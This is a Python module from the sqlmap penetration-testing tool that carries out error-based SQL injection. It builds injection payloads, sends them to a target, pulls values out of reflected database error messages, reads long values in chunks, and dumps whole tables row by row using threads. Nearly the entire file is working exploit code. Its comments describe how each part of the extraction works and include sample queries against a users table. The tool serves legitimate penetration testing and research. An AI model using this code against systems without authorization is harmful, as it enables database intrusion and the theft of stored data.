#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from __future__ import print_function

import re
import time

from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.bigarray import BigArray
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeDbmsHexValue
from lib.core.common import extractRegexResult
from lib.core.common import firstNotNone
from lib.core.common import getConsoleWidth
from lib.core.common import getPartRun
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import incrementCounter
from lib.core.common import initTechnique
from lib.core.common import isListLike
from lib.core.common import isNumPosStrValue
from lib.core.common import listToStrValue
from lib.core.common import readInput
from lib.core.common import unArrayizeValue
from lib.core.common import wasLastResponseHTTPError
from lib.core.compat import xrange
from lib.core.convert import decodeHex
from lib.core.convert import getUnicode
from lib.core.convert import htmlUnescape
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import HTTP_HEADER
from lib.core.exception import SqlmapDataException
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import MIN_ERROR_CHUNK_LENGTH
from lib.core.settings import MAX_ERROR_CHUNK_LENGTH
from lib.core.settings import NULL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.settings import ROTATING_CHARS
from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD
from lib.core.settings import SQL_SCALAR_REGEX
from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT
from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.utils.progress import ProgressBar
from thirdparty import six

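# Single-shot retrieval helper: wraps the (sub)expression between the random
# kb.chars.start/kb.chars.stop markers inside the error-based vector, sends the
# request and extracts whatever the DBMS reflected between those markers in the
# response (body, HTTP error page, headers or redirect message)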
def _oneShotErrorUse(expression, field=None, chunkTest=False):
    offset = 1
    rotator = 0
    partialValue = None
    threadData = getCurrentThreadData()

    retVal = hashDBRetrieve(expression, checkConf=True)

    if retVal and PARTIAL_VALUE_MARKER in retVal:
        partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")
        logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue))
        offset += len(partialValue)

    threadData.resumed = retVal is not None and not partialValue

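    # On MySQL/MSSQL the reflected error message is typically truncated by the
    # server, so the usable chunk length is probed first: a REPEAT()/REPLICATE()
    # test string of decreasing size is requested until it comes back intact,
    # and the resulting length is cached in kb.errorChunkLength (and the session
    # hashdb) for all subsequent SUBSTRING-based retrievals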
    if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode:
        debugMsg = "searching for error chunk length..."
        logger.debug(debugMsg)

        current = MAX_ERROR_CHUNK_LENGTH

        while current >= MIN_ERROR_CHUNK_LENGTH:
            testChar = str(current % 10)

            testQuery = "%s('%s', %d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current)
            testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery)

            result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True))

            if (result or "").startswith(testChar):
                if result == testChar * current:
                    kb.errorChunkLength = current
                    break
                else:
                    result = re.search(r"\A\w+", result).group(0)
                    candidate = len(result) - len(kb.chars.stop)
                    current = candidate if candidate != current else current - 1
            else:
                current = current // 2

        if kb.errorChunkLength:
            hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength)
        else:
            kb.errorChunkLength = 0

    if retVal is None or partialValue:
        try:
            while True:
                check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
                trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start

                if field:
                    nulledCastedField = agent.nullAndCastField(field)

                    if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest:
                        extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0)
                        if extendedField != field:  # e.g. MIN(surname)
                            nulledCastedField = extendedField.replace(field, nulledCastedField)
                            field = extendedField

                        nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength)

                # Forge the error-based SQL injection request
                vector = kb.injection.data[kb.technique].vector
                query = agent.prefixQuery(vector)
                query = agent.suffixQuery(query)
                injExpression = expression.replace(field, nulledCastedField, 1) if field else expression
                injExpression = unescaper.escape(injExpression)
                injExpression = query.replace("[QUERY]", injExpression)
                payload = agent.payload(newValue=injExpression)

                # Perform the request
                page, headers, _ = Request.queryPage(payload, content=True, raise404=False)

                incrementCounter(kb.technique)

                if page and conf.noEscape:
                    page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page)

                # Parse the returned page to get the exact error-based
                # SQL injection output
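                # (the value is searched for, in order, in the page body, the
                # last HTTP error page, the response headers and the last
                # redirect message, as some servers reflect the error text in
                # only one of those places)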
                output = firstNotNone(
                    extractRegexResult(check, page),
                    extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
                    extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
                    extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
                )

                if output is not None:
                    output = getUnicode(output)
                else:
                    trimmed = firstNotNone(
                        extractRegexResult(trimCheck, page),
                        extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
                        extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
                        extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
                    )

                    if trimmed:
                        if not chunkTest:
                            warnMsg = "possible server trimmed output detected "
                            warnMsg += "(due to its length and/or content): "
                            warnMsg += safecharencode(trimmed)
                            logger.warn(warnMsg)

                        if not kb.testMode:
                            check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2]
                            output = extractRegexResult(check, trimmed, re.IGNORECASE)

                            if not output:
                                check = r"(?P<result>[^\s<>'\"]+)"
                                output = extractRegexResult(check, trimmed, re.IGNORECASE)
                            else:
                                output = output.rstrip()

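                # MySQL/MSSQL return the value in chunks of at most
                # kb.errorChunkLength characters, so keep appending chunks and
                # advancing the SUBSTRING offset until a short (or empty) chunk
                # marks the end of the value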
                if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
                    if offset == 1:
                        retVal = output
                    else:
                        retVal += output if output else ''

                    if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest:
                        offset += kb.errorChunkLength
                    else:
                        break

                    if output and conf.verbose in (1, 2) and not conf.api:
                        if kb.fileReadMode:
                            dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
                        elif offset > 1:
                            rotator += 1

                            if rotator >= len(ROTATING_CHARS):
                                rotator = 0

                            dataToStdout("\r%s\r" % ROTATING_CHARS[rotator])
                else:
                    retVal = output
                    break

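        # on any error or user interrupt, persist what has been retrieved so
        # far (marked with PARTIAL_VALUE_MARKER) so that a later run can resume
        # from the stored offset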
        except:
            if retVal is not None:
                hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER))

            raise

        retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal

        if isinstance(retVal, six.string_types):
            retVal = htmlUnescape(retVal).replace("<br>", "\n")

        retVal = _errorReplaceChars(retVal)

        if retVal is not None:
            hashDBWrite(expression, retVal)

    else:
        _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
        retVal = extractRegexResult(_, retVal) or retVal

    return safecharencode(retVal) if kb.safeCharEncode else retVal

def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False):
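    """
    Retrieves the value of each field of the given expression (row-limited
    via agent.limitQuery() when 'num' is provided), echoing progress to the
    console unless 'suppressOutput' is set
    """
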
    values = []
    origExpr = None

    width = getConsoleWidth()
    threadData = getCurrentThreadData()

    for field in expressionFieldsList:
        output = None

        if field.startswith("ROWNUM "):
            continue

        if isinstance(num, int):
            origExpr = expression
            expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])

        if "ROWNUM" in expressionFieldsList:
            expressionReplaced = expression
        else:
            expressionReplaced = expression.replace(expressionFields, field, 1)

        output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)

        if not kb.threadContinue:
            return None

        if not suppressOutput:
            if kb.fileReadMode and output and output.strip():
                print()
            elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields):
                status = "[%s] [INFO] %s: '%s'" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output))

                if len(status) > width:
                    status = "%s..." % status[:width - 3]

                dataToStdout("%s\n" % status)

        if isinstance(num, int):
            expression = origExpr

        values.append(output)

    return values

def _errorReplaceChars(value):
    """
    Restores safely replaced characters
    """

    retVal = value

    if value:
        retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")

    return retVal

def _formatPartialContent(value):
    """
    Prepares (possibly hex-encoded) partial content for safe console output
    """

    if value and isinstance(value, six.string_types):
        try:
            value = decodeHex(value, binary=False)
        except:
            pass
        finally:
            value = safecharencode(value)

    return value

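# Illustrative usage, assuming an already established error-based injection
# point (query and table names below are hypothetical examples):
#   errorUse("SELECT CURRENT_USER()")                        -> single value
#   errorUse("SELECT name, surname FROM users", dump=True)   -> list of rows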
def errorUse(expression, dump=False):
    """
    Retrieve the output of a SQL query taking advantage of the error-based
    SQL injection vulnerability on the affected parameter.
    """

    initTechnique(kb.technique)

    abortedFlag = False
    count = None
    emptyFields = []
    start = time.time()
    startLimit = 0
    stopLimit = None
    value = None

    _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)

    # Set kb.partRun in case the engine is called from the API
    kb.partRun = getPartRun(alias=False) if conf.api else None

    # We have to check if the SQL query might return multiple entries
    # and in such case forge the SQL limiting the query output one
    # entry at a time
    # NOTE: we assume that only queries that get data from a table can
    # return multiple entries
    if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE " not in expression.upper() or ("(CASE " in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
        expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)

        if limitCond:
            # Count the number of SQL query entries output
            countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)

            if " ORDER BY " in countedExpression.upper():
                _ = countedExpression.upper().rindex(" ORDER BY ")
                countedExpression = countedExpression[:_]

            _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)
            count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields))

            if isNumPosStrValue(count):
                if isinstance(stopLimit, int) and stopLimit > 0:
                    stopLimit = min(int(count), int(stopLimit))
                else:
                    stopLimit = int(count)

                    infoMsg = "used SQL query returns "
                    infoMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry")
                    logger.info(infoMsg)

            elif count and not count.isdigit():
                warnMsg = "it was not possible to count the number "
                warnMsg += "of entries for the SQL query provided. "
                warnMsg += "sqlmap will assume that it returns only "
                warnMsg += "one entry"
                logger.warn(warnMsg)

                stopLimit = 1

            elif (not count or int(count) == 0):
                if not count:
                    warnMsg = "the SQL query provided does not "
                    warnMsg += "return any output"
                    logger.warn(warnMsg)
                else:
                    value = []  # for empty tables

                return value

            if isNumPosStrValue(count) and int(count) > 1:
                if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
                    message = "due to huge table size do you want to remove "
                    message += "ORDER BY clause gaining speed over consistency? [y/N] "

                    if readInput(message, default="N", boolean=True):
                        expression = expression[:expression.index(" ORDER BY ")]

                numThreads = min(conf.threads, (stopLimit - startLimit))

                threadData = getCurrentThreadData()

                try:
                    threadData.shared.limits = iter(xrange(startLimit, stopLimit))
                except OverflowError:
                    errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
                    errMsg += "with switch '--fresh-queries'"
                    raise SqlmapDataException(errMsg)

                threadData.shared.value = BigArray()
                threadData.shared.buffered = []
                threadData.shared.counter = 0
                threadData.shared.lastFlushed = startLimit - 1
                threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1

                if threadData.shared.showEta:
                    threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))

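                # pre-check for completely empty columns (only worthwhile when
                # there are fewer columns than rows and the row count exceeds
                # CHECK_ZERO_COLUMNS_THRESHOLD); such columns are not queried
                # row by row but filled with NULLs instead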
                if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
                    for field in expressionFieldsList:
                        if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
                            emptyFields.append(field)

                            debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
                            debugMsg += "dumped as it appears to be empty"
                            logger.debug(debugMsg)

                if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
                    kb.suppressResumeInfo = True

                    debugMsg = "suppressing possible resume console info because of "
                    debugMsg += "large number of rows. It might take too long"
                    logger.debug(debugMsg)

                try:
                    def errorThread():
                        threadData = getCurrentThreadData()

                        while kb.threadContinue:
                            with kb.locks.limit:
                                try:
                                    threadData.shared.counter += 1
                                    num = next(threadData.shared.limits)
                                except StopIteration:
                                    break

                            output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)

                            if not kb.threadContinue:
                                break

                            if output and isListLike(output) and len(output) == 1:
                                output = unArrayizeValue(output)

                            with kb.locks.value:
                                index = None

                                if threadData.shared.showEta:
                                    threadData.shared.progress.progress(threadData.shared.counter)

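                                # worker threads finish out of order, so each
                                # retrieved row is first placed into a buffer
                                # sorted by row index and flushed to the shared
                                # value only once all preceding rows are flushed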
                                for index in xrange(1 + len(threadData.shared.buffered)):
                                    if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
                                        break

                                threadData.shared.buffered.insert(index or 0, (num, output))

                                while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
                                    threadData.shared.lastFlushed += 1
                                    threadData.shared.value.append(threadData.shared.buffered[0][1])
                                    del threadData.shared.buffered[0]

                    runThreads(numThreads, errorThread)

                except KeyboardInterrupt:
                    abortedFlag = True

                    warnMsg = "user aborted during enumeration. sqlmap "
                    warnMsg += "will display partial output"
                    logger.warn(warnMsg)

                finally:
                    threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
                    value = threadData.shared.value
                    kb.suppressResumeInfo = False

    if not value and not abortedFlag:
        value = _errorFields(expression, expressionFields, expressionFieldsList)

    if value and isListLike(value):
        if len(value) == 1 and isinstance(value[0], six.string_types):
            value = unArrayizeValue(value)
        elif len(value) > 1 and stopLimit == 1:
            value = [value]

    duration = calculateDeltaSeconds(start)

    if not kb.bruteMode:
        debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[kb.technique], duration)
        logger.debug(debugMsg)

    return value